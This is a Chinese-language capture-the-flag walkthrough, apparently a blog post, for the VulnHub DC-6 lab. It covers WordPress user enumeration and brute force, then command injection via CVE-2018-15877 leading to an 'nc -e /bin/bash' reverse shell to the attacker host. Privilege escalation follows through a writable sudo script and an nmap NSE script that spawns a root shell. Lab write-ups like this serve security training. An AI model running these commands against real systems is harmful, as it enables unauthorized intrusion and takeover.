DC系列:6 (DC-6靶机渗透测试详细步骤)

环境搭建

详情

名称DC- 6
发布日期2019年2月28日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-6,315/

描述

DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,所以应该非常适合初学者。

此挑战的最终目标是获得 root 权限并读取唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

对于初学者,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文以获得帮助,让你重新开始。
但请注意:我不会给你答案,而是给你一个关于如何前进的想法。

使用工具

靶机:DC-6 192.168.10.164
hacker:kali 192.168.10.153

一:信息收集

0x01查看存活主机

 arp-scan -l  

在这里插入图片描述

0x02查看主机开放的端口

masscan --rate=100000 --ports 0-65535 192.168.10.164  

在这里插入图片描述

0x03查看端口开放的服务

nmap -sV -T4 -O -p 80,22 192.168.10.164  

在这里插入图片描述

0x04查看主机指纹信息

whatweb http://192.168.10.164   

在这里插入图片描述

0x05访问靶机HTTP服务

发现浏览器找不到此网站(dns无法解析此ip)
在这里插入图片描述
添加“192.168.10.164 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)

在这里插入图片描述
发现可以进行正常访问,此时发现有word press建站后台登录口
在这里插入图片描述

二:漏洞发现

0x01 用户名枚举

wpscan --url http://wordy/ -e u
在这里插入图片描述

0x02 暴力破解用户名口令

wpscan --url http://wordy/ -U username.txt -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述
发现activity monitor插件
在这里插入图片描述

0x03 漏洞信息查询

尝试搜索此插件的漏洞信息
在这里插入图片描述
查找到一个漏洞,查看使用手册
在这里插入图片描述

01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877

CVE-2018-15877漏洞

在这里插入图片描述

三:漏洞利用

0x01 命令执行漏洞

尝试拼接命令,ping 192.168.10.153|ls

在这里插入图片描述

发现可以执行,抓包进行命令执行
ping 192.168.10.153| nc -e /bin/bash 192.168.10.153 1234

在hacker上监听1234端口

在这里插入图片描述

0x02getshell成功

反弹shell成功
在这里插入图片描述

0x03开启终端

python -c ‘import pty;pty.spawn("/bin/bash")’ 开启一个python终端

四:提权

0x01查看用户信息

cd 到/home/mark目录下查看文件things-to-do 文档,查看
在这里插入图片描述
翻译一下。。。提示到有用户 graham的口令,尝试su graham切换用户
在这里插入图片描述
查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行

在这里插入图片描述

0x02转换身份

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh 尝试以jens身份执行此文件,发现切换成功
在这里插入图片描述

0x03 找到提权点

在这里插入图片描述
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本

echo ‘os.execute("/bin/bash")’ > get_root.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
在这里插入图片描述
nmap --script=/home/jens/get_root.nse 执行此脚本
提权成功
在这里插入图片描述

0x04flag获取

cd 到root下拿到flag文件,渗透结束(可以留后门——)
在这里插入图片描述

总结

这次渗透测试,考察了hacker对于暴力破解的理解掌握,对于命令执行攻击漏洞以及对于反弹shell的理解和对于提权方式的掌握。

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值